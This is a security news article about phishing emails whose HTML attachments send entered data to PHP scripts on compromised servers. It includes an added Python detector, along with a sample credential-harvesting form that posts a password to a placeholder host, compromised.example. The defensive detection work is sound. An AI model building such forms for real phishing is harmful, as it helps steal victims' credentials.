Phishers use new bait to trap victims

To get around phishing blacklists in browsers, scammers are luring people by using HTML attachments instead of URLs, a security firm has warned.

HTML phishing scam

An example of a phishing attack encouraging the recipient to download an HTML attachment and provide information. Note the poor grammar, "required informations", which should be a red flag. (Credit: M86)

Chrome and Firefox are good at detecting phishing sites and warning web surfers via a browser notice when they are about to visit a site that looks dangerous. So good, in fact, that scammers are resorting to a new tactic to lure victims into their traps via emails — attaching HTML files that are stored locally when they are opened, according to an M86 blog post.

After the user fills in a form with the information the scammers want to steal and clicks "submit", the HTML form sends the data through a POST request to a PHP (Hypertext Preprocessor) script hosted on a legitimate web server that has been compromised. (POST is used when a computer is sending data over the internet to a web server.) Because few PHP URLs are reported as abuse, this action does not trigger a warning from the browser, M86 said.

"Months-old phishing campaigns remain undetected, so it seems this tactic is quite effective," the blog post said. "Logically, however, the browser should be able to detect a URL when the browser sends the POST request."

The phishing URLs alone, without the HTML form, are hard to verify because the PHP script runs on the server and returns no visible HTML after the submit button is clicked, other than a redirect to a page belonging to the company the scammer was impersonating, the post said.
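As an added example (not code from the M86 post, and not how Gmail's attachment check is implemented), here is a small Python scanner in the spirit of the mail-side defence the article describes: it parses an HTML attachment and flags any form that collects credentials and POSTs them to a remote host, which a locally opened attachment has no legitimate reason to do. The sample attachment text and the host name compromised.example are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names that suggest a form is harvesting account data.
SENSITIVE_FIELDS = {"password", "pin", "ssn", "cardnumber", "card_number", "cvv", "account"}


class FormCollector(HTMLParser):
    """Collects every <form> in a document with its action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(((a.get("name") or "").lower(),
                                            (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(doc):
    """Return [(reasons, action)] for forms matching the attachment-phishing pattern:
    credential fields whose data is POSTed to a host outside the local file."""
    parser = FormCollector()
    parser.feed(doc)
    findings = []
    for f in parser.forms:
        target = urlparse(f["action"])
        remote = bool(target.netloc)            # relative/empty action stays on the local file
        asks_secret = any(t == "password" or n in SENSITIVE_FIELDS for n, t in f["fields"])
        reasons = []
        if remote and f["method"] == "post":
            reasons.append("posts to remote host")
        if target.path.lower().endswith(".php"):
            reasons.append("php endpoint")
        if asks_secret:
            reasons.append("collects credentials")
        if remote and asks_secret:              # both present: flag the attachment
            findings.append(("; ".join(reasons), f["action"]))
    return findings


# Constructed sample of the attachment style described in the article (placeholder host).
SAMPLE_ATTACHMENT = """<html><body><form method="post" action="http://compromised.example/verify.php">
<input name="username"><input type="password" name="password">
<input type="submit" value="Submit"></form></body></html>"""
```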

To protect against this, people should avoid opening HTML attachments if the email seems suspicious and not provide any information in forms. Financial institutions do not send such attachments to customers.

While many people will click on a link in an email that looks like it comes from their bank, fewer are likely to open the HTML attachment.

Mozilla representatives did not provide comment on the report today. Meanwhile, Google provided this comment: "Google has a number of defences against phishing sites to help protect our users. For example, Gmail checks HTML attachments for phishing sites and displays a warning to users when one is detected. We always encourage users to be cautious when handling unexpected attachments and when providing personal information requested by email."

Via CNET
